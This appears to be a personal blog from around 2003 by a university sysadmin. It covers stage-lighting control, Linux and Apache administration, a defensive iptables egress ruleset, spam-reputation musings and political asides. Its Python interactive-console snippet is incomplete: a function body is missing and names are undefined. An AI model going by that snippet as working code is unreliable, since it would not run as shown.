    Well, the Xmas carnival p...

    Well, the Xmas carnival passed off ok. I lasted about 22 hours before sitting comatose in the bar. I must be getting old, I've done better than that before. (Then again, Gary's really old an he managed ok :)). Link to photos will happen at some point.

    The Artistic License box to control the MAC600 worked fine, though we ran it off the Pearl in the end. I need to write a better control interface (e.g. one that doesn't require you to input a seq of funcs for each of pan, tilt and color). To that end, PyGTK, glade and PyGtkGLExt work really well.

    I'm off home today as well. Yay Xmas break.

    (In other news; can you possibly think of anything worse than Slashdot Singles?. And I'm not kidding, OSDN is really running this complete with "First emails: What to say".)

    Snippets

    I like Artistic Licence a lot. Partly because they make some really cool stuff, but mostly because they sent me one of these for free.

    (Yes, you too can get a positive mention on IV by sending me free hardware)

    One of those, for people who don't know and can't understand the link, is an Art-Net to DMX converter. DMX is the serial protocol used for controling stage and event lighting and so I can now control this from a Python script.

    So I'm frantically coding in whatever free time slots I can find so that I can use it to control a pair of MAC 600s on Friday.

    Of course, like all good tasks, I don't get to test it until until the day of the event.

    And on the frontpage of the manual, it reads:

    This product is for professional use only. It is not for household use. This product presents risks of lethal or severe injury due to fire and heat, electric shock, ultraviolet radiation, lamp explosion and fall.

    :)

    While I'm thinking about it, a couple of Python snippets that I'm always looking for.

    Dumping an exception is:

    try:
        ...
    except:
        traceback.print_exc ()

    And running an interactive console looks like:

    import threading
    import rlcompleter
    import readline
    
    readline.parse_and_bind("tab: complete")
    
    glock = threading.Lock ()
    input_has_glock = 0
    exit_event = threading.Event ()
    
    def worker_thread ():
    	# lock glock when running
    
    if __name__ == "__main__":
            import __main__
            worker = threading.Thread (target = worker_thread)
            worker.start ()
            c = code.InteractiveConsole (locals=__main__.__dict__)
            c.raw_input = locking_raw_input
            c.interact ("Starting interactive control...")

    My life:Last night: Setup...

    My life:

    • Last night: Setup for Streetcar. Goto Union Staff party. Start striking Streetcar. Take the money down to DPFS and get locked out of the rest of the strike. Goto Cav's with Ash and Harriet. Go back to Beit to pack away their Xmas party.
    • Today: Sleep and work on all the coursework due in this week
    • Monday: Normal day at Uni. Talk to Malcomb about Summer Ball venues. Work all evening to get coursework finished.
    • Tuesday: Normal day at uni. Setup mics for Council. Dramsoc bar night. Have to decided which parts of the all nighter I can manage.
    • Wednesday: 9am - LotR. 2pm - setup for Rock night at the Union; goes on until late then we strike it.
    • Thursday: Normal day at Uni. Rig and point parcan's on the roof in the evening.
    • Friday: 7am - goto Stage with Gary to pickup lights. Rig, run and strike the Xmas Carnival. Probably a 24 hour shift.

    Fleep...

    Fleep

    So, Bush wants to go to t...

    So, Bush wants to go to the moon again. At least, he wants to announce it during his last year to try and boost his popularity before the election. He's already screwed the economy by borrowing huge amounts to fund tax cuts and a couple of semi-major wars. This is what happens when you put a monkey in charge.

    When dear old dad proposed the same thing, Congress estimated that it would cost $400 billion. I think we can safely say that it would actually cost a fair bit more than that. And for what? The first lunar missions were basically a world-wide moonie at the USSR. Certainly, it did wonders for technology, but given the price, I would certainly hope so.

    But what's the point this time? There's no USSR and we've done it all before. Go do something useful like asteroid mining instead.

    Panic, everyone upgrade r...

    Panic, everyone upgrade rsync to 2.5.7

    The number of recent atta...

    The number of recent attacks against infrastructure is getting worrying. Within the past few weeks we have had an attack on the kernel sources, on the Debian core servers and, today, on a Gentoo rsync rotation server and Savannah.

    Savannah and Debian breaks look identical. The CVS attack, we don't know about and I'm thinking that the Gentoo break was unrelated because they didn't go after the obvious spoils. I'm still very interrested to know what the "remote exploit" was.

    It's still greatly worrying that someone determined and smart is going after important boxes like these. And I do mean smart - watching the BK changesets for a fix and then making a binary from the do_brk overflow isn't script kiddie stuff.

    Backup solution

    Random thoughts of the day...

    Register a domain name and point it somewhere silly like 1.1.1.1. Make a tarball of your most important files and encrypt it. Then, once a day, email it to a user at that domainname. If you have a disk failure just wait a couple of days and all your files get bounced back to you

    Torture

    Most people would agree that torturing a conscious being is bad. Most of them would say that it's criminal and that you should be locked up for it. But what's is a conscious being? At least, if it's biological and can pass the Turing Test, is that good enough?

    So now imagine how your best friend doing a Turing Test. By definition your mental representation of them passes the Turing Test because if you would expect different answers then you just aren't thinking hard enough. So your mental representation is conscious.

    So now imagine torturing them. Should you be thrown in jail?

    Guardian Digital

    The Guardian Online has been my favourite online paper for a long time. I find that it, balanced against Samizdata is best.

    But now, the Guardian is beta-testing a new service. It has both the Guardian and its sister paper, the Observer, and you can select any page from any section of the print editions and get a thumbnail view. Clicking on a story brings up the text of that story. Clicking a picture (even an advert) brings up that advert and you can get PDFs of any page. And you can go back in time to see old editions.

    This is such a gob-smackingly cool service I might even start paying for it when it leaves beta phase.

    Well, it's really peeing ...

    Well, it's really peeing it down with rain and has been all weekend. It's quite nice to look out on the rain when you're inside, but its enough to make me not want to bother going to the supermarket so I'll probably be eating weird combinations of whatever I can find over the next week.

    Things that I need to do:

    Get the new Union webserver racked up. And when I racked up, I mean in the very loosest sense as this is a desktop mini-tower that will be sitting on a rack plate.

    I then need to try and convert the users. No amount of warning is going to work for most of them and I fully expect to be snowed under with dozens of "But why shouldn't I use the account of someone who left years ago, like I always have?", "Why can't I upload gigs of warez and use the server as a distro for all my friends?" and "Your computer has broken because this has stopped working and I'm perfect and cannot possibly be doing anything wrong".

    Get the RS232 protocol to the crossovers working. The docs say that they can be daisy chained, but as far as I know they only have a single connector. I'm not sure of the electrical problems if I split the cable. And I've got to reverse engineer the undocumented bits of the protocol.

    For Zooko...

    ... if you email me to say that your mail is down you really should include a phone number or some such. Some non-email way of contacting you at least!

    I'm afriad that mail.imperialviolet.org doesn't point at anything any more. It's not a hard bounce, so mail won't fail because of it, but the server doesn't exist anymore. If you need a backup-MX I can set it up on my current mail server (a.mx.freenetproject.org).

    Dear Mr Stephenson...

    ... I'm not totally sure that the term "cluster-fuck" was in common usage in England in 1685. (Quicksilver, page 702).

    (Actually, it's a really good book. That's the first complaint I've had)

    "Wave of human spam" - ph...

    "Wave of human spam" - phrase of the week from this fantastic text. I mean, one of them seriously has a sign saying "The Illuminati must be destroyed".

    What a difference an edit...

    What a difference an editor makes eh? All that not wanting to upset people and so forth . Well, here's the original...

    What would you do if you organised a protest and no one turned up? Well the Stop Bush Campaign are finding out at the moment. Despite getting over 100 hundred people willing to sign a petition asking the Union to express that the views of the entire student body were against Bush, only 16 of them were seemingly willing to express those views themselves today.

    Somewhat more were willing to brave the heated comforts of the MDH last night for the self-styled `People's AGM'. In the aforementioned meeting 32 people turned up and most of the meeting was spent trying to decide whether to protest against Bush, or against Bush and the Union. What's a protestor to do with all that pent up frustration and so much to protest about? The decision, rather unsurprisingly, was to protest against both. Also planned was a sleep-in protest, however our dedicated freedom fighters seemingly forgot their sleeping bags (despite reminders on their own posters). Maybe they value their oil-powered creature comforts too highly?

    The rather lack-lustre protest observed today from the lofty heights of Beit Towers consisted of 16 rather cold looking people and a megaphone meandering into the quad for 60 seconds before vanishing up the south steps of the Royal Albert Hall and onto Hyde Park. Of course the Union officers who were the partial target of this protest were, rather rudely, all away at Wye for the day.

    So, that was worth the days of standing on the walkway thrusting slices of pulped, dead tree at people who really don't care, wasn't it?

    (note, I'm not pro-Bush. I'm just very anti most anti-Bush protesters. My enemy's enemy is not my friend.

    Remebered to renew domain...

    Remebered to renew domain name with 3 hours to go.

    Hell, at least it's better than Microsoft with hotmail.co.uk

    Crush Games

    This new MP isn't very good at replying to letters. The last one at least wrote something back.

    (prompted, of course, by today's ID card announcement)

    I meant to post this a while ago. It's an extract of an email I sent. Firstly you'll need a little background: someone setup a website for registering `crushes' (I guess it goes around like those quiz things) and then opened up the database for a while before having a pang of consience and closing it again. First I hear was spikeylady complaining:

    but am most unimpressed that I can't now find out if anyone had a crush on me

    Actually, that's a really interesting game problem. You want to know about all incoming arcs (people who have a crush on you) but are unwilling to disclose any outgoing arcs (people who have a crush on you). Except I guess that you are willing to disclose if you are sure the other party has a crush on you.

    I didn't see the "crush thing", but I'm guess you could register your crushes on other people and it would tell you about any two node cycles (e.g. if they also fancied you). Of course, you could just falsely register everyone and find out exactly who has a crush on you. You've not given any information away because you picked the trivial subset. Of course, anyone else can do that so your number of false positives goes up as more people choose this strategy. So pretty soon any kind of service is like that is going to be useless.

    (esp if they start publishing the results)

    Which reminds me of one of the answers to the two-party signature problem (you have a contract that two people need to sign. Neither will sign first so they take turns saying "With 1% probability I agree to this", "With 2%" ... and so on).

    Assume a fully connected, directed graph of all the people in the set of interest. Each person assigns a probability is crush to each outgoing node and at each time slice that is the probability that you'll `ping' the other node.

    Pings will be pretty random and you might see a higher than average number of pings from a given node. It could be random, but it could be that they have assigned a higher probability to you. If you crush on them, you can assign a higher probability and see if they respond. That way, pairs of crushers will rise out of the mess and noone has to disclose a non-reciprocated crush.

    A little like flirting, but could be made so that noone else sees any of the interactions by blinding the pings.

    Matrix Revolutions

    Well, it seems to be Matrix-bashing day to day. Well, I was watching it at 2pm GMT today and I really enjoyed it. It's certainly not the best film this year (Sprited Away) and the story is a pile of crap, but it's damm fun.

    If I had been writing the script, it could have been better of course. (Ah, I wonder how many people are saying that). But the Battle of Zion is worth the ticket price alone.

    Birthday!

    Since I don't do it nearly enough these days (being a poor, destitute student and all) I walked into a large bookshop today with a few notes in my back pocket and came out with a nice lot of dead tree, including:

    Reviews as I finish them. (Could be a while).

    Bastards!. Don't they kno...

    Bastards!. Don't they know how much effort by .. unknown persons .. goes into doing something like that? Or so I've heard, of course.

    So what, exactly, has the...

    So what, exactly, has the Whitehouse got against people archiving their pages about Iraq?

    Quoting from http://whitehouse.gov/robots.txt:

    Disallow:       /vicepresident/vpphotoessay/cheneyalumnifield/iraq
    Disallow:       /vicepresident/vpphotoessay/cheneyalumnifield/text
    Disallow:       /vicepresident/vpphotoessay/iraq
    Disallow:       /vicepresident/vpphotoessay/part1/iraq
    Disallow:       /vicepresident/vpphotoessay/part1/text
    Disallow:       /vicepresident/vpphotoessay/part2/iraq
    Disallow:       /vicepresident/vpphotoessay/part2/text

    It goes on for a long time like that.

    Just written some notes o...

    Just written some notes on the DoC webserver setup. Just so that people can see what goes into a complex Apache setup. And this isn't even factoring in all the research groups and Tomcat servers.

    Look at that timestamp. D...

    Look at that timestamp. Damm timezone differences for the Google Codejam.

    Don't quite think I've made it to the top 250. Read that last sentence in a slightly sarcastic tone. I just hope that I'm not last.

    It seems that not only cannot I not type very well at this time in the morning, I can't read either.

    Things I found out today

    Tristan pointed out that most of the images linked to below where, in fact, all the same. My mouse skills were obviously on the blink at that moment. The links have now been fixed.

    Linux 2.6 has real per user accounting:

    struct user_struct {
            atomic_t __count;       /* reference count */
            atomic_t processes;     /* How many processes does this user have? */
            atomic_t files;         /* How many open files does this user have? */
    
            /* Hash table maintenance information */
            struct list_head uidhash_list;
            uid_t uid;
    };
    

    This means that process and open files limits apply across the whole system, not per session like they used to. It also means that if a setuid call would cause the resource limit to be exceeded then it returns EAGAIN

    Also, Apache 1.3.28 has a known bug with CGI handling and SuEXEC which means it leaves zombies all over the place (offical patch released). Guess how this and the above conspired to bite me today.

    Apache 1.3 cannot proxy SSL requests. But Apache 2 can, and it can cache the results. It also supports SCTP for those who know/care what that is.

    Also, despite fluffing the second question it looks like I might have made the top 500 cut in the GoogleJam

    And slashdot has just published this story about how the FTAA treaty is going to ratchet up IP laws again. But for once the UK isn't part of it.

    Another letter to my MP, ...

    Another letter to my MP, this time on software patents.

    God doesn't work. "it puts God to the test - and there are clear instructions in the Bible not to do this" - well designed meme wasn't it? Poor deluded sods.

    Google Code Jam

    Great picture: Found Nemo

    The film is not fantastic, but a good way to spend a couple of hours.

    A while ago Google announced the Google CodeJam which is basically another coding competition. This one is a little different to anything else I've done because it's a sit at home competition. This presents some advantages; it's most comfortable and you get a vim working the way you want. It also means there is a lot of scope for cheating.

    Once you look at the first problem you have 60 minutes to submit solutions. You can only submit once, but they do have a reasonable testing framework.

    The score you get for a problem is based on how long you take to submit it. Once the coding phase (this weekend) is over they go and test the programs and anything that fails a test is discounted.

    The top 500 go onto the next round.

    It's obvious that a single user could in fact be a team of coders working on the problem. It's also quite possible to be many users and to read the questions well ahead of your `time' starting. The latter problem is slightly resolved because there are 10 sets of questions. But that just increases the work needed by a factor of 10 and creating 11 users isn't a lot of work.

    Personally I didn't understand what the hell the second problem was asking and, looking back on it, I still don't. And the second problem is worth 80% of the marks so I've failed this one. Maybe they will run it next year.

    C&G Ball

    In crewing news - the City and Guilds Ball went very well even if I did get home at 7am the following morning and the punters arrived 3 hours before we were expecting them.

    Webserver for User CGI

    Running CGI scripts for users on your webserver is a dangerous game. Not only do users test their runaway fork-bombing scripts but they also install known buggy versions of phpBB and the like and let your webserver get compromised.

    And even if they cannot get root, crackers can use your >1Gps of bandwidth to turn your poor webserver into the central warez site for the whole of Europe over the weekend. I know. It's happened to us.

    And so, tweetypie is born. The first thing to do is get rid of modphp and force all users to run php via the CGI binary and build Apache with SuEXEC support.

    User may complain about not having modphp, but just slap them with rack rails until they go away. Then install this patch which sets resource limits on all CGI scripts and configure iptables to block all outgoing non-system packets:

    *filter
    :INPUT ACCEPT [89251:15855936]
    :FORWARD ACCEPT [0:0]
    :OUTPUT ACCEPT [85660:11402157]
    -A OUTPUT -d 146.169.1.1 -p udp -m udp --dport 53 -j ACCEPT 
    -A OUTPUT -d 146.169.1.24 -p udp -m udp --dport 53 -j ACCEPT 
    -A OUTPUT -d 146.169.1.189 -p tcp -m tcp --dport 5432 -j ACCEPT 
    -A OUTPUT -m owner --uid-owner sshd -j ACCEPT 
    -A OUTPUT -m owner --uid-owner wwwnot -j ACCEPT 
    -A OUTPUT -m owner --uid-owner root -j ACCEPT 
    -A OUTPUT -m owner !--uid-owner root -j DROP 
    COMMIT

    Then setup 2000 bind mounts to work around a race condition in the kernel (you almost certainly don't have the kind of load that would trigger this - so you can ignore it) and voila!

    Simple eh?

    Diebold are making a mess...

    Diebold are making a mess about their memos being published and are C&Ding lots of websites.

    So go mirror them

    Busy..

    Within two weeks...

    ServerFunctionFuckup
    HeronPrimary webserverWell, this was an emergency move after a hardware failure of the old server. Unfortunately, we forgot some stuff and someone rooted it via phpBB and sudo. So another emergency move (3 hours last Sunday night) onto a new server which we will enable CGI on when we feel ready. (It's roughly the same as running a public access shell server).
    ChukarOnline Backup serverRAID controller decided it was a good day to die. Emergency move to an unused server promptly killed it and after a second move it seems ok
    FayaResearch group serverMultiple disk failure. Scrape remains off and replace
    ParakeetSyslog and secure console serverPrimary disk failure. Scrape remains off and replace.

    And Merlin (major fileserver) froze solid today and needed a SysRq-B. I think we should ask physics dept what experiments that started doing about two weeks ago.

    One top of that, every spare moment has been spent running Fresher's Week at the union. [photos]

    Well, it's a new year at ...

    Well, it's a new year at Imperial and that means a whole new lot of freshers and lots of people saying "God. I hope we weren't that clueless and dumb last year" (us) and "I feel ill" (them, drunk).

    Hopefully photos of the freshers welcoming party will be up soon. That took the last 3 days of setting up but seemed to go down pretty well. The rest of the week involves shuffling equipment around for all the other fresher events as they happen.

    Early this morning I actually managed to get to sleep on a sofa, on a stage, in the middle of the concert hall which was empty except for lots of intelligent lights, a really good drum-n-bass DJ and two huge speaker stacks giving 10kW's of sonic goodness.

    Hmm, what else.. oh yea; Practical Cryptography is good. All crypto coders should probably have it on their shelfs. I've got a 7/2 split of courses over the next two terms (so I'm going to get buggered silly this term and be going to be going to random other lectures again next term for something to do).

    Thanks to Polly for point...

    Thanks to Polly for pointing that I'm that I'm in New Scientist again.

    Just written a new letter...

    Just written a new letter to my MP about ID cards in the UK.

    Ok, so I haven't posted a...

    Ok, so I haven't posted anything here for quite a while and I'm still feeling too lazy to write anything so I'm going to post an edited version of an email I've just send because it saves me doing any work .

    I've just got ADSL working in my new flat and the ADSL modem is so a Linux box with a silly menu system on the front. But it works, even if I'm a little afraid that the 50:1 contention is going to bite once all the students in this area manage to get it going.

    Term starts at the end of next week (or this week, depending on when you consider the week to start) and so I've quite a lot of rigging to do before Saturday. (That's rigging in the sense of setting up stuff like this

    (Typing this over ssh while emerging. I think I need to look at the QoS settings of this modem.)

    I'm also the union server admin (FreeBSD) as of Wednesday and every society on Earth (seemingly) has suddenly realised that they need to update their webpage for the new year and can anyone remember the password? Can they buggery.

    At least I'm giving them random passwords this year without the ability to change them, so there's no chance that they'll forget to write them down somewhere really stupid and obvious, thus saving me this problem next year.

    And are there any new phd or staff boxes installed and ready? And are we really going to have the 25 new Apple dual-proc G5s (which arrived yesterday, weeks late) done and deployed by the end of the week? And am I going to have to install my automounter on every box that I actually want to use because autofs and amd are such piles of crap? And do I really think that just because my summer job ended yesterday that I'm not going to be pulling 12 hour days all next week in the department and at the union to get things ready?

    Fun, fun, fun! :)

    Well, updates to the Veri...

    Well, updates to the Verisign countermeasures page are continuting apace. Thankfully it seems that ICANN and IAB are now applying political pressure to the problem.

    New release of Bane. Nothing but a few bug fixes, but it seems stable (been running for 13 days here at least).

    Also, I've released Conserv and Figures source code. If anyone actually wants to use either of them, just drop me an email (link at the top of the page) and it might motivate me to write some actual documentation

    OpenSSH exploit

    OpenSSH exploit

    Just written a program to...

    Just written a program to fix Verisign dumbness here

    Update: That page also contains patches for BIND and djbdns as well now (those are not my code, however)

    The missing files problem...

    The missing files problem turned out to be a Mandrake rc.sysinit fault. The moral of the story is fsck has a "reboot computer" return code. Respect it.

    And this is a little bit freaky. (from JWZ):

    Aoccdrnig to rscheearch at Cmabrigde Uinervtisy, it deosn't mttaer in waht oredr the ltteers in a wrod are, the olny iprmoetnt tihng is taht the frist and lsat ltteer be at the rghit pclae. The rset can be a total mses and you can sitll raed it wouthit a porbelm. Tihs is bcuseae the huamn mnid deos not raed ervey lteter by istlef, but the wrod as a wlohe.

    New Chicane album out tomorrow. I've already heard a bit part of it at their live consort and this will the be the first albulm in a long while that I've actually been looking forward to.

    RIP amendment is back

    RIP amendment is back

    I've got permission to public domain everything that I've coded over the summer, which I shall be doing soon(ish). But for the moment I've got ext3 filesystems that are loosing files after a SysRq-Unmount. And I'm not talking about files that were open at the time, I'm talking about gcc and core libraries. So I need to find out what is causing that.

    Intel 8086:24d5 Soundcards

    If you have one of these, upgrade alsa-libs to 0.9.6 and get the CVS versions of both alsa-kernel and alsa-drivers and put kernel in drivers as a subdirectory. Build everything and then it will pretty much work, but only in OSS compatibility mode.

    Flat panel color separation

    If you get color sepation on your flat panel when using programs that do subpixel antialiasing (such as this Mozilla build) then put something like this into /etc/fonts/fonts.conf

    <match target="font">
    	<edit name="rgba" mode="assign"><const>gbr</const></edit>
    </match>
    

    and reorder the gbr string until it works (or set it to rrr to disable).

    Viewing manpages in Vim

    Thanks to Gentoo forums you can view your manpages in Vim, if you like:

    export MANPAGER="col -b | view -c 'set ft=man nomod nolist' -"

    I've put up a new page fo...

    I've put up a new page for Seagull's Bane. The new release only has better code comments and a tiny fix.

    You can also see the documentation for another project of mine here. I hope to release the code for this and NSANet soon.

    Dealing with spam

    Personally, all the spam I get is filtered by procmail without any fancy statistical magic, or indeed, without looking at the body of the message at all. So if everyone could be like me the spam problem would go away.

    But it seems that spam is a big problem for other people, and whilst I don't really worry about other people's problems very much when I have such a wide choice myself, spam filtering provides a nice thought exercise for a while. Not to mention a chance to lever in a few better ways of doing things

    From a technical point of view I would start a company that runs sweatshops filtering spam by hand. They would have to have fair language skills, but English is pretty commonplace and there are enough sweatshop labors so I keep getting told.

    However, I have a few non-technical problems with running sweatshops and it doesn't involve very much code, so probably isn't much fun.

    AMTP is a small extension to the SMTP protocol that makes TLS mandatory and sets an evil bit (more or less) for each message. If the sending host doesn't correctly set the evil bit then you have a CA issued identity to lynch.

    This is basically a 2-level trust tree. Everyone trusts the elite CAs and they trust all the ISPs in the world and so on. The major problem with this being that a CA issued identity costs, lots. From a management point of view this might seem like a very good idea. Get all those geeks off the Internet and then we can get down to making money off it ... somehow.

    But it's making email sending exclusive (because it's expensive) and this is our end-to-end network goddammit.

    There has been plenty of good work done by the reputation people about this sort of thing. But generally they are considering how to deal with reputation when you hold the whole graph. (Though anyone should feel free to point me at a paper which solves these issues). Dealing with reputation when one can only see a couple of small areas of the graph is a whole different matter.

    Consider a simple system when a node (person) is free to setup a directed arc (reputation certificate) to any other node. Each arc has a float between 0..1 which indicates how confident the source is, that the destination will not send spam. Also assume that a node will accept a message if the sender can show a path from the target to the sender such that the product of all the arc weights is greater than 0.1.

    Without a good knowledge of the graph, the sender isn't going to be able to find such a path, even if it exists. Assuming that there is a way to walk the graph, it's going to take a connection-request-reply to lots of different servers to get the information. (Because we wouldn't have it on one central server as that would be Bad).

    See the aside below in which I contradict myself after you have read the rest.

    However, most of the time I'm exchanging email with people that I have a good contact with. Messages which would require many hops of the trust graph are quite rare.

    Thus it would be perfectly possible for search servers to hold much of the graph in memory. There wouldn't be a single central search server (as that would be Bad), but there wouldn't need to be as the server need not be trusted as it cannot lie. Possibly that would be enough to make the system work.

    Issues that I'm no going to think about till the morning... negative certs, caching issues, the problem of time delay if a trusted source goes 'bad' (which are all rooted in the same issue).

    Aside

    Above, I state that searching the trust network wouldn't work. But it occurs to me that it would be fairly simple to find a path quite efficiently.

    The trust graph is going to have a power law distribution. I don't know why, but I would be very surprised if it didn't. So, starting from two points A and B, to find a path between them walk up the orders until up hit a common meeting point at a high order node.

    Walking up from B assumes that much of the time if C trusts D, then D trusts C. Because you actually want to find a path, in the end, that goes down to B. This assumption makes the graph look `symmetricish' and so the trick might produce a path pretty quickly. Unfortunately, the symmetric assumption falls down for the high order nodes.

    You can see some of the d...

    You can see some of the documentation for DoC management network here

    I've moved and have no inet link in the new place (yet) so I've not going to be writing too much.

    The future of money: priv...

    The future of money: private complementary currencies

    Seagull's Bane

    Well, here's the promised public release of Seagull's Bane. A simple linux automouter which doesn't do lots of silly crap (amd) that most people don't want and doesn't get trivially upset (autofs and amd).

    It's Creative Common's public domain.

    I'm going to switch to using it on my box at work, so I'll probably release a few new versions over a few days with fixes :). !STARTDOWNLOAD !DOWNLOAD bane* !ENDDOWNLOAD

    Of, and email is working again from Freenet's nice new server.

    Email fucked until at lea...

    Email fucked until at least late Tuesday. agl02 at doc.ic.ac.uk should still work.

    xMule Mirror up

    here (via BoingBoing)

    Apparently I have been subpoenad, personally, on 8-17-2003 by an as-yet unknown entity under the DMCA clause, because of xmule, when it went on to gov'ment radar w/ the e-matters.de alert :P The subpoena lasts, suposedly, until Dec 6, when i must stand infrotn of a federal appellet court

    Why Pipes Suck

    I'm going to have to do something about this problem at some point, but for the moment I'm going to settle with describing it.

    I'm considering the design of some status monitoring for the servers in DoC. At the moment we have some pretty complex triggers setup on our admin Postgres server that allows you to insert values into a table and have per-minute and per-hour tables filled out automatically with the min, max and average. This is all very nice, but very slow. Postgres just can't handle it so we need something different.

    We want to be able to set alarms on values over any averaging time and we want to record the per-hour, per-minute, per-day etc data for long term analysis of server load and so forth.

    I've written a small C program that parses /proc/stat and pulls useful information out of it. Every bit of information is a name-value pair like servername.load, 2.3. I don't want to have to bother with authenticating raw TCP connections so I'm going to have the status server ssh out and invoke the monitoring program to trusted servers.

    That's all just background.

    Now I have lots of incoming streams from the servers and I need to demultiplex them into a stream with all the data. I'm a good UNIX programmer so I want everything to be as modular as possible. Let's say that I collect the data with a command line like: ssh -t -t -x ... servername /usr/bin/monitor_program | domcat /var/status_data (domcat is like netcat, but for UNIX domain sockets). Now I need a program that can merge the incoming streams and allow people to connect and receive the total stream.

    If I was being a poor UNIX programmer I would pass a couple of TCP port numbers to this program. It would take all the input from anyone who connected to the first port, merge it and throw it out to everyone connected to the second port.

    But the decision to use TCP shouldn't be ingrained (authentication nightmare), nor should the splitting of streams (it's just data). All this program should do is use it's protocol specific knowledge to merge streams into one. Thankfully, I already have a program called conguardian that just passes file descriptors to the stdin of it's child and accepts (and authenticates) connections from a named UNIX domain socket. So, the command line is looking like: conguardian /var/status-data merger_program.

    But how do we get the data out of it? We write a program called splitter that just takes an input stream from stdin and copies it to everyone who connects. Thankfully, conguardian already abstracts the business of accepting and authenticating connections. So we say conguardian /var/status-data merger_program | conguardian /var/status-data-out splitter.

    Opps! conguardian passes file descriptors in via stdin and we are trying to pipe data into stdin. How well do you know your shell syntax? Can you even pipe the output of one program into a numbered fd input of another? Are you going to have a headache by the time you have finished?

    I'm always finding that I can't connect programs together with anything like the flexibility I want. How do you do bidirectional pipes? You put make programs' name and arguments, arguments of the first and write special fork handling code in the first. And if you want two bidirectional inputs to the second program? Oh dear.

    (The above may be clearer if I include the conguardian manpage)

    CONGUARDIAN(1)                                     CONGUARDIAN(1)
    
    
    NAME
           conguardian - Access control for UNIX domain sockets
    
    SYNOPSIS
           conguardian <path to socket> <child process> [<child argu
           ments>]...
    
    DESCRIPTION
           conguardian attempts to unlink the given socket path if it
           exists and is a socket. If it is not a socket then it will
           fail to bind to it and give up.
    
           conguardian accepts connections on the  given  socket  and
           checks  the  UID of the other end against an internal list
           of allowed usernames. UID 0  is  always  allowed  and  the
           internal  list is initially empty. If not on the list, the
           connection is terminated.
    
           If the client is allowed and sends an  ASCII  NUL  as  the
           first  byte,  the  connection  is passed to the child over
           UNIX domain DGRAM socket on stdin. If the client  sends  a
           0x01  byte and is root, it can upload a new username list.
    
    ENVIRONMENT
           IDENT given in all syslog messages
    
    AUTHOR
           Adam Langley <agl@imperialviolet.org>
                                                       CONGUARDIAN(1)
    
    Perl 6 Essentials

    As O'Reilly books go, this is a pretty small one. It's list price ($25) is more than I would value it at, but I got it from the library .

    The book is in three sections: an introduction to Perl 6, an introduction to Parrot and a primer in Parrot assembly. The last one is highly skimmable unless you are actually programming in Parrot assembly (in which case you probably already have a far better knowledge of Parrot).

    Now Perl 6 looks quite cool, it fixes a couple of things that I don't like about Perl 5. Assigning a hash or array to a scalar produces a reference to it...

    Interlude: I'm half watching a program about asteroid impacts and I've just seen a (poor) computer graphics simulation of an impact on right on Imperial College, of all the places in the world. I'm a little gob smacked...

    ... which makes a lot more sense than assigning the phase of the moon or something. And the rules system (even more complex regular expressions) looks very powerful and a little more sane than Perl 5 regexps.

    Also, we have an intelligent equality (~~) operator, which looks neat and leads to a nice switch operator (given). But I'm a little concerned about the number of different things it does depending on the types of it's arguments, but that's very Perlish. And the book lists 12 different contexts in which anything can be evaluated.

    Less cosmetically, Perl 6 might gain continuation and coroutine support from Parrot. I don't know if Perl 6 will actually expose these, but Parrot can do them. And Parrot looks like it could really do wonders for open source scripting languages. It looks fast, and has been designed to support Perl 6, Ruby, Parrot, Scheme and others. Intercalling between them might allow us to get rid of some of the terrible C glue code that we have at the moment.

    One thing that does worry me about Parrot is that it's basic integer type is a signed 32-bit. If you want anything else you have to use PMCs, which is a vtable based data type that allows for arrays and hashs and so forth, and is much slower. Now there are many applications for which 31-bits isn't enough. File offsets are obvious, but how about UID and device numbers? Both of these are looking like that are going to be 32-bit unsigned ints. You can fit this into a Parrot signed int, but it's going to cause huge headaches.

    UPSs

    I've been dealing with APC UPSs a fair bit this week. A quick Google search will turn up the serial protocol that they use and it's really quite nice. A lot of devices (APC MasterSwitches for one) have a fancy vt100 menu interface which is totally unusable for an automated system. The UPSs, on the other hand have a simple byte code protocol and hopefully I'll have the servers shutting down neatly in a power failure. Software like that already exists but it's generally too far simple minded. We have many servers on any given UPS and some servers on several.

    APC do loose points for their serial cables however. APC supply (for quite a price) so called 'smart cables' that are specially pinned out and nothing else uses the same interface. Thankfully, after looking at diagrams for about an hour I stuck 3 pins into a D9->RJ45 converter and it worked first time!

    Automounters

    (IV should stop falling over quite as often now. It looks like there's a bug in the sunrpc code in 2.4.20 kernels. The maintainer doesn't know why, but 2.4.21 fixed it.)

    I'm rewriting a replacement user-land automounting daemon at the moment which I'll post here when it's kindof ready. The two current solutions (autofs and amd) are either too fragile (autofs) or too bloated and too fragile (amd). Sadly enough, amd came from Imperial CSG originally and has turned into a monster over time.

    I'm a little limited in what I can do on my laptop however (I'm at home for the weekend) because it only has GCC 2.95 which lacks the nice C99 features that GCC3 supports. (Actually I'm a little hazy on which are C99 features and which are GCC extensions. But since the automounter is only ever going to run on Linux they are pretty much the same).

    Lexical functions and C++ style variable decl placement are an absolute wonder (though I have found a couple of placement gotchas which might be because I was using a CVS GCC). One thing that I'm not so sure about is run-time array sizes.

    This allows the size value of an array to be a run-time variable. I suppose this (with the more flexible decl placement) is a `cleaner' way of doing alloca. But it was certainly a surprise when I forgot a sizeof, thus making the array size run-time and (so it happened) negative. It certainly scared the crap out of gdb.

    And speaking of gdb, it doesn't seem to understand much that GCC3 turns out. I guess I need to start CVS chasing gdb again (like I did when pthreads support was still going in).

    2.6 Kernels

    I got 2.6.0-test3 to boot. This is the first 2.5/2.6 kernel that has ever managed to boot on my system. Personally it doesn't seem too obscure to me, but the AIC7xxx and megaraid cards have always freaked out a 2.5/2.6 kernel until now. (Which was kindof a bummer since the only root device I had left without those was a floppy disk).

    I'm not sure if it's really that much quicker than a fully patched (preempt etc) 2.4, but at least it saves me from patching every kernel version with XFS. The new sysfs seems a little weird. I guess it's still a -test quality release, but different devices don't seem to argee on how to format things like device numbers and the like.

    Still, udev thinks it can simulate devfs in userspace via sysfs and /sbin/hotplug, which is quite neat. I guess I'll need a `real' /dev directory again however, since you can't mount udev at boot like you can with devfs.

    Also, I want disklabel support added to grub and the kernel. You can quite happily put UUID= and LABEL= tags in /etc/fstab, but you still need to give `real' device numbers to the kernel and grub. Worse yet, the kernel device numbers depend on the order of Linux drivers loading and grub's depend on the order of BIOSes loading. Under 2.4 there is pretty much no good way (that I know of) to get grub device numbers.

    I think that the kernel people would say that support for labelled roots should go in an initrd. And I would agree with them if I didn't hate initrd's so much for all the pain they have caused me. I guess I should to hack linux/init/*.c.

    I should also post my grub -R patch here (one shot reboots).

    Blaster

